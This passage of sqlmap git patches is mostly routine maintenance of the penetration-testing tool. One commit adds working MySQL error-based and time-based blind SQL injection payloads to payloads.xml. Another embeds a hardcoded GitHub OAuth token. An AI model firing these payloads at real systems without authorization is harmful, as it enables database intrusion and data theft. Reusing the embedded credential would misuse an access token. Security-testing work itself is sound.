+++ b/lib/controller/checks.py
@@ -1119,9 +1119,17 @@ def checkWaf():
         conf.parameters = dict(backup)
 
     if retVal:
-        warnMsg = "it appears that the target is protected. Please "
-        warnMsg += "consider usage of tamper scripts (option '--tamper')"
+        warnMsg = "it appears that the target "
+        warnMsg += "is protected"
         logger.critical(warnMsg)
+
+        if not conf.identifyWaf:
+            message = "do you want sqlmap to try to detect backend "
+            message += "WAF/IPS/IDS? [y/N] "
+            output = readInput(message, default="N")
+
+            if output and output[0] in ("Y", "y"):
+                conf.identifyWaf = True
     else:
         infoMsg = "it appears that the target is not protected"
         logger.info(infoMsg)
@@ -1184,8 +1192,8 @@ def identifyWaf():
         if output and output[0] not in ("Y", "y"):
             raise SqlmapUserQuitException
     else:
-        infoMsg = "no WAF/IDS/IPS product has been identified"
-        logger.info(infoMsg)
+        warnMsg = "no WAF/IDS/IPS product has been identified"
+        logger.warn(warnMsg)
 
     kb.testType = None
     kb.testMode = False

From 9f4a32ca2b31e1571397998b85a7aa96d74bf012 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 20 Jan 2015 10:03:35 +0100
Subject: [PATCH 307/492] Automatically checking for sitemap existence in case
 of --crawl

---
 lib/utils/crawler.py | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 28b4d5790..1d7033d26 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -28,6 +28,7 @@ from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import runThreads
+from lib.parse.sitemap import parseSitemap
 from lib.request.connect import Connect as Request
 from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup
 from thirdparty.oset.pyoset import oset
@@ -116,6 +117,26 @@ def crawl(target):
         threadData.shared.deeper = set()
         threadData.shared.unprocessed = set([target])
 
+        if not conf.sitemapUrl:
+            message = "do you want to check for the existence of "
+            message += "site's sitemap(.xml) [Y/n] "
+            test = readInput(message, default="Y")
+            if test[0] not in ("n", "N"):
+                items = None
+                url = "%s://%s/sitemap.xml" % (conf.scheme, conf.hostname)
+                try:
+                    items = parseSitemap(url)
+                except:
+                    pass
+                finally:
+                    if items:
+                        for item in items:
+                            if re.search(r"(.*?)\?(.+)", item):
+                                threadData.shared.value.add(item)
+                        if conf.crawlDepth > 1:
+                            threadData.shared.unprocessed.update(items)
+                    logger.info("%s links found" % ("no" if not items else len(items)))
+
         infoMsg = "starting crawler"
         if conf.bulkFile:
             infoMsg += " for target URL '%s'" % target

From cd743ab098d78b5687b17905920c0bb22660a223 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 21 Jan 2015 09:12:12 +0100
Subject: [PATCH 308/492] Minor update

---
 lib/core/option.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 29b06c434..eb42dc8d5 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1268,9 +1268,9 @@ def _setHTTPAuthentication():
         debugMsg = "setting the HTTP(s) authentication PEM private key"
         logger.debug(debugMsg)
 
-        key_file = os.path.expanduser(conf.authPrivate)
-        checkFile(key_file)
-        authHandler = HTTPSPKIAuthHandler(key_file)
+        _ = os.path.expanduser(conf.authPrivate)
+        checkFile(_)
+        authHandler = HTTPSPKIAuthHandler(_)
 
 def _setHTTPExtraHeaders():
     if conf.headers:

From 02b3eb941feaceb9e21e267e9d187e03d0fae3b3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 21 Jan 2015 09:26:30 +0100
Subject: [PATCH 309/492] Patch for an Issue #1124

---
 lib/core/common.py | 17 +++++++++++++++++
 lib/core/option.py |  9 +++++----
 2 files changed, 22 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 872b949fd..dc3b6cbfc 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -14,6 +14,7 @@ import hashlib
 import httplib
 import inspect
 import json
+import locale
 import logging
 import ntpath
 import os
@@ -1558,6 +1559,22 @@ def normalizePath(filepath):
 
     return retVal
 
+def safeExpandUser(filepath):
+    """
+    Patch for a Python Issue18171 (http://bugs.python.org/issue18171)
+    """
+
+    retVal = filepath
+
+    try:
+        retVal = os.path.expanduser(filepath)
+    except UnicodeDecodeError:
+        _ = locale.getdefaultlocale()
+        retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING)))
+
+    print retVal
+    return retVal
+
 def safeStringFormat(format_, params):
     """
     Avoids problems with inappropriate string format strings
diff --git a/lib/core/option.py b/lib/core/option.py
index eb42dc8d5..860eddddd 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -52,6 +52,7 @@ from lib.core.common import readCachedFileContent
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import runningAsAdmin
+from lib.core.common import safeExpandUser
 from lib.core.common import sanitizeStr
 from lib.core.common import setOptimize
 from lib.core.common import setPaths
@@ -496,7 +497,7 @@ def _setRequestFromFile():
 
     addedTargetUrls = set()
 
-    conf.requestFile = os.path.expanduser(conf.requestFile)
+    conf.requestFile = safeExpandUser(conf.requestFile)
 
     infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
     logger.info(infoMsg)
@@ -619,7 +620,7 @@ def _setBulkMultipleTargets():
     if not conf.bulkFile:
         return
 
-    conf.bulkFile = os.path.expanduser(conf.bulkFile)
+    conf.bulkFile = safeExpandUser(conf.bulkFile)
 
     infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
     logger.info(infoMsg)
@@ -1268,7 +1269,7 @@ def _setHTTPAuthentication():
         debugMsg = "setting the HTTP(s) authentication PEM private key"
         logger.debug(debugMsg)
 
-        _ = os.path.expanduser(conf.authPrivate)
+        _ = safeExpandUser(conf.authPrivate)
         checkFile(_)
         authHandler = HTTPSPKIAuthHandler(_)
 
@@ -1475,7 +1476,7 @@ def _cleanupOptions():
 
     for key, value in conf.items():
         if value and any(key.endswith(_) for _ in ("Path", "File")):
-            conf[key] = os.path.expanduser(value)
+            conf[key] = safeExpandUser(value)
 
     if conf.testParameter:
         conf.testParameter = urldecode(conf.testParameter)

From 2655b078d0134042adb1e24bc109fac14fbaecb4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 22 Jan 2015 08:52:15 +0100
Subject: [PATCH 310/492] Patch for an Issue #1127

---
 lib/core/dump.py     | 6 ++++--
 lib/core/settings.py | 3 +++
 2 files changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index 09b590624..c6272e4d3 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -39,10 +39,12 @@ from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
 from lib.core.settings import HTML_DUMP_CSS_STYLE
+from lib.core.settings import IS_WIN
 from lib.core.settings import METADB_SUFFIX
 from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
 from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
 from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import WINDOWS_RESERVED_NAMES
 from thirdparty.magic import magic
 
 from extra.safe2bin.safe2bin import safechardecode
@@ -398,7 +400,7 @@ class Dump(object):
             return
 
         _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
-        if len(_) < len(db):
+        if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
             _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
             dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
             warnFile = True
@@ -429,7 +431,7 @@ class Dump(object):
                     dumpDbPath = tempDir
 
             _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
-            if len(_) < len(table):
+            if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
                 _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
                 dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
                 warnFile = True
diff --git a/lib/core/settings.py b/lib/core/settings.py
index b91a36f38..e13be3aeb 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -213,6 +213,9 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)
 
+# Names that can't be used to name files on Windows OS
+WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
+
 # Items displayed in basic help (-h) output
 BASIC_HELP_ITEMS = (
                         "url",

From b7cfaa6ca52285cf24a530f3f8c0712a2d8b0088 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 22 Jan 2015 08:55:37 +0100
Subject: [PATCH 311/492] Minor style update

---
 lib/controller/checks.py | 13 +++++--------
 1 file changed, 5 insertions(+), 8 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 8681cc229..5e93c6256 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1096,9 +1096,9 @@ def checkWaf():
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
     """
 
-    infoMsg = "heuristically checking if the target is protected by "
-    infoMsg += "some kind of WAF/IPS/IDS"
-    logger.info(infoMsg)
+    dbmMsg = "heuristically checking if the target is protected by "
+    dbmMsg += "some kind of WAF/IPS/IDS"
+    logger.debug(dbmMsg)
 
     retVal = False
     backup = dict(conf.parameters)
@@ -1119,8 +1119,8 @@ def checkWaf():
         conf.parameters = dict(backup)
 
     if retVal:
-        warnMsg = "it appears that the target "
-        warnMsg += "is protected"
+        warnMsg = "heuristics detected that the target "
+        warnMsg += "is protected by some kind of WAF/IPS/IDS"
         logger.critical(warnMsg)
 
         if not conf.identifyWaf:
@@ -1130,9 +1130,6 @@ def checkWaf():
 
             if output and output[0] in ("Y", "y"):
                 conf.identifyWaf = True
-    else:
-        infoMsg = "it appears that the target is not protected"
-        logger.info(infoMsg)
 
     return retVal
 

From 779db7cbc382d655d1178dd0b06ed49813843a95 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 22 Jan 2015 09:17:45 +0100
Subject: [PATCH 312/492] Minor enhancement

---
 lib/core/common.py | 10 +++++++++-
 lib/core/option.py | 10 +++++++---
 2 files changed, 16 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index dc3b6cbfc..6578f6bd6 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -582,10 +582,15 @@ def paramToDict(place, parameters=None):
                         warnMsg += "so sqlmap could be able to run properly"
                         logger.warn(warnMsg)
 
-                        message = "are you sure you want to continue? [y/N] "
+                        message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
                         test = readInput(message, default="N")
                         if test[0] not in ("y", "Y"):
                             raise SqlmapSilentQuitException
+                        else:
+                            original = [_ for _ in string.ascii_letters + string.digits]
+                            shuffled = list(original)
+                            random.shuffle(shuffled)
+                            kb.easterEgg = dict(_ for _ in zip(original, shuffled))
                     elif not _:
                         warnMsg = "provided value for parameter '%s' is empty. " % parameter
                         warnMsg += "Please, always use only valid parameter values "
@@ -824,6 +829,9 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
             else:
                 message = data
 
+            if kb.easterEgg:
+                message = "".join(kb.easterEgg.get(_, _) for _ in message)
+
             if hasattr(conf, "api"):
                 sys.stdout.write(message, status, content_type)
             else:
diff --git a/lib/core/option.py b/lib/core/option.py
index 860eddddd..d6eed56c4 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -477,11 +477,14 @@ def _adjustLoggingFormatter():
         return
 
     def format(record):
-        _ = boldifyMessage(FORMATTER._format(record))
+        message = FORMATTER._format(record)
+        if kb.easterEgg:
+            message = "".join(kb.easterEgg.get(_, _) for _ in message)
+        message = boldifyMessage(message)
         if kb.prependFlag:
-            _ = "\n%s" % _
+            message = "\n%s" % message
             kb.prependFlag = False
-        return _
+        return message
 
     FORMATTER._format = FORMATTER.format
     FORMATTER.format = format
@@ -1712,6 +1715,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
+    kb.easterEgg = None
     kb.headersFp = {}
     kb.heuristicDbms = None
     kb.heuristicMode = False

From 32bf2dbe6d0e0acbe2006040089ccb3aeefae366 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 23 Jan 2015 23:00:28 +0100
Subject: [PATCH 313/492] Patch for an Issue #1133

---
 lib/core/option.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index d6eed56c4..2a4d2c49f 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2273,8 +2273,8 @@ def _basicOptionValidation():
         errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0):
-        errMsg = "value for option '--tor-port' must be a positive integer"
+    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
+        errMsg = "value for option '--tor-port' must be in range 0-65535"
         raise SqlmapSyntaxException(errMsg)
 
     if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):

From ae95fd91c2bcc325d4a3691ca0abd0b0082b7ac5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 24 Jan 2015 23:49:33 +0100
Subject: [PATCH 314/492] Implementation for an Issue #1135

---
 xml/payloads.xml | 43 ++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 42 insertions(+), 1 deletion(-)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index 97d92fbf2..c85aedd63 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1693,6 +1693,27 @@ Formats:
     -->
     <!-- End of error-based tests - WHERE or HAVING clause -->
 
+    <!-- Error-based tests - After ORDER BY...LIMIT... -->
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+    <!-- End of error-based tests - After ORDER BY...LIMIT... -->
 
     <!-- Error-based tests - Parameter replace -->
     <test>
@@ -2980,7 +3001,6 @@ Formats:
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of AND time-based blind tests -->
 
-
     <!-- OR time-based blind tests -->
     <test>
         <title>MySQL &gt; 5.0.11 OR time-based blind</title>
@@ -3281,6 +3301,27 @@ Formats:
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of OR time-based blind tests -->
 
+    <!-- Time-based tests - After ORDER BY...LIMIT... -->
+    <test>
+        <title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+    <!-- Time-based tests - After ORDER BY...LIMIT... -->
 
     <!-- Time-based blind tests - Parameter replace -->
     <test>

From f0eac38ab49f3101984f7703fd8380e21a4b6837 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 26 Jan 2015 08:48:37 +0100
Subject: [PATCH 315/492] Minor fix

---
 lib/core/common.py | 2 +-
 lib/core/option.py | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6578f6bd6..e098e83e9 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -829,7 +829,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
             else:
                 message = data
 
-            if kb.easterEgg:
+            if kb.get("easterEgg"):
                 message = "".join(kb.easterEgg.get(_, _) for _ in message)
 
             if hasattr(conf, "api"):
diff --git a/lib/core/option.py b/lib/core/option.py
index 2a4d2c49f..f03d91906 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -478,7 +478,7 @@ def _adjustLoggingFormatter():
 
     def format(record):
         message = FORMATTER._format(record)
-        if kb.easterEgg:
+        if kb.get("easterEgg"):
             message = "".join(kb.easterEgg.get(_, _) for _ in message)
         message = boldifyMessage(message)
         if kb.prependFlag:

From eb548959b3506bd252f239d941baf9f7980b401b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 26 Jan 2015 08:59:10 +0100
Subject: [PATCH 316/492] Minor update

---
 lib/core/log.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/log.py b/lib/core/log.py
index 503cdf4e1..3d3328545 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
 
 LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
-LOGGER.setLevel(logging.WARN)
+LOGGER.setLevel(logging.INFO)

From fd632e5adab7f6759c377671badabd62f0729f79 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 26 Jan 2015 09:09:38 +0100
Subject: [PATCH 317/492] Update for unhandled exception mechanism (BADA)

---
 lib/core/common.py   | 2 ++
 lib/core/settings.py | 2 +-
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index e098e83e9..77c919590 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2994,6 +2994,8 @@ def createGithubIssue(errMsg, excMsg):
             warnMsg = "something went wrong while creating a Github issue"
             if ex:
                 warnMsg += " ('%s')" % ex
+            if "Unauthorized" in warnMsg:
+                warnMsg += ". Please update to the latest revision"
             logger.warn(warnMsg)
 
 def maskSensitiveData(msg):
diff --git a/lib/core/settings.py b/lib/core/settings.py
index e13be3aeb..302bc9bb7 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -483,7 +483,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "d6c0c7bf3f2298a7b85f82176c46d2f8d494fcc5"
+GITHUB_REPORT_OAUTH_TOKEN = "29f6bdf5ce4424fc17a19405bce75d6aca7dcd27"
 
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

From 5400bb2c9513e6cb95349fe54f4e2bc5d5e730e3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 28 Jan 2015 00:52:40 +0100
Subject: [PATCH 318/492] Patch for an Issue #1142

---
 lib/core/option.py | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index f03d91906..704e664e6 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1458,7 +1458,11 @@ def _createTemporaryDirectory():
         errMsg += "writeable by the current user"
         raise SqlmapSystemException, errMsg
 
-    kb.tempDir = tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+    if "sqlmap" not in (tempfile.tempdir or ""):
+        tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+
+    kb.tempDir = tempfile.tempdir
+
     if not os.path.isdir(tempfile.tempdir):
         os.makedirs(tempfile.tempdir)
 

From 024c500d8ed9966c3a6a7efbfff72bb6f536b3dd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 28 Jan 2015 00:54:39 +0100
Subject: [PATCH 319/492] Minor fix

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 704e664e6..ce5bec9dd 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -481,7 +481,7 @@ def _adjustLoggingFormatter():
         if kb.get("easterEgg"):
             message = "".join(kb.easterEgg.get(_, _) for _ in message)
         message = boldifyMessage(message)
-        if kb.prependFlag:
+        if kb.get("prependFlag"):
             message = "\n%s" % message
             kb.prependFlag = False
         return message

From 9f679a952f9de3a9a6897b9c2cdc426bba5828b4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 29 Jan 2015 10:44:36 +0100
Subject: [PATCH 320/492] Minor update

---
 lib/core/common.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/core/common.py b/lib/core/common.py
index 77c919590..026f0a84d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -586,6 +586,8 @@ def paramToDict(place, parameters=None):
                         test = readInput(message, default="N")
                         if test[0] not in ("y", "Y"):
                             raise SqlmapSilentQuitException
+                        elif test.lower() == "yy":
+                            pass
                         else:
                             original = [_ for _ in string.ascii_letters + string.digits]
                             shuffled = list(original)

From 9563e429d393c337d8229298c14be453795f9cb6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 30 Jan 2015 21:49:22 +0100
Subject: [PATCH 321/492] Removal of fun code

---
 lib/core/common.py | 10 ----------
 lib/core/option.py |  3 ---
 2 files changed, 13 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 026f0a84d..209d05f60 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -586,13 +586,6 @@ def paramToDict(place, parameters=None):
                         test = readInput(message, default="N")
                         if test[0] not in ("y", "Y"):
                             raise SqlmapSilentQuitException
-                        elif test.lower() == "yy":
-                            pass
-                        else:
-                            original = [_ for _ in string.ascii_letters + string.digits]
-                            shuffled = list(original)
-                            random.shuffle(shuffled)
-                            kb.easterEgg = dict(_ for _ in zip(original, shuffled))
                     elif not _:
                         warnMsg = "provided value for parameter '%s' is empty. " % parameter
                         warnMsg += "Please, always use only valid parameter values "
@@ -831,9 +824,6 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
             else:
                 message = data
 
-            if kb.get("easterEgg"):
-                message = "".join(kb.easterEgg.get(_, _) for _ in message)
-
             if hasattr(conf, "api"):
                 sys.stdout.write(message, status, content_type)
             else:
diff --git a/lib/core/option.py b/lib/core/option.py
index ce5bec9dd..6288f52ee 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -478,8 +478,6 @@ def _adjustLoggingFormatter():
 
     def format(record):
         message = FORMATTER._format(record)
-        if kb.get("easterEgg"):
-            message = "".join(kb.easterEgg.get(_, _) for _ in message)
         message = boldifyMessage(message)
         if kb.get("prependFlag"):
             message = "\n%s" % message
@@ -1719,7 +1717,6 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
-    kb.easterEgg = None
     kb.headersFp = {}
     kb.heuristicDbms = None
     kb.heuristicMode = False

From 9e90e357cfd633b3466637c56221e61fc2435201 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 30 Jan 2015 21:59:03 +0100
Subject: [PATCH 322/492] Patch for an Issue #1146

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 6779707e7..15296a36c 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -594,7 +594,7 @@ class Connect(object):
         if conn and getattr(conn, "redurl", None):
             _ = urlparse.urlsplit(conn.redurl)
             _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
-            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1)
+            requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % re.escape(getUnicode(_)), requestMsg, 1)
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
         else:
             responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

From 2e9bf477030cd4332a32bee7a5b39c3cdb61afff Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 30 Jan 2015 22:12:35 +0100
Subject: [PATCH 323/492] Heuristic check for WAF/IDS/IPS is now prone to
 tamper functions (Issue #1145)

---
 lib/controller/checks.py | 11 +++--------
 1 file changed, 3 insertions(+), 8 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 5e93c6256..589ed8a86 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1101,22 +1101,17 @@ def checkWaf():
     logger.debug(dbmMsg)
 
     retVal = False
-    backup = dict(conf.parameters)
     payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
 
-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
-    conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload)
-
-    logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
+    value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+    value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
 
     try:
-        retVal = Request.queryPage(getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+        retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
     except SqlmapConnectionException:
         retVal = True
     finally:
         kb.matchRatio = None
-        conf.parameters = dict(backup)
 
     if retVal:
         warnMsg = "heuristics detected that the target "

From bf1c08a8a6c36fc2d9b0a415fa30412fc2a1609a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 30 Jan 2015 22:43:40 +0100
Subject: [PATCH 324/492] Bug fix

---
 lib/core/common.py | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 209d05f60..47207972a 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -544,7 +544,6 @@ def paramToDict(place, parameters=None):
     if place in conf.parameters and not parameters:
         parameters = conf.parameters[place]
 
-    parameters = parameters.replace(", ", ",")
     parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
     if place == PLACE.COOKIE:
         splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)

From 8b135e45bd849b1cb33621d57b536e40eb3c40e3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 2 Feb 2015 22:05:31 +0100
Subject: [PATCH 325/492] Patch for an Issue #1147

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 6cda6f500..b5d13e7c8 100644
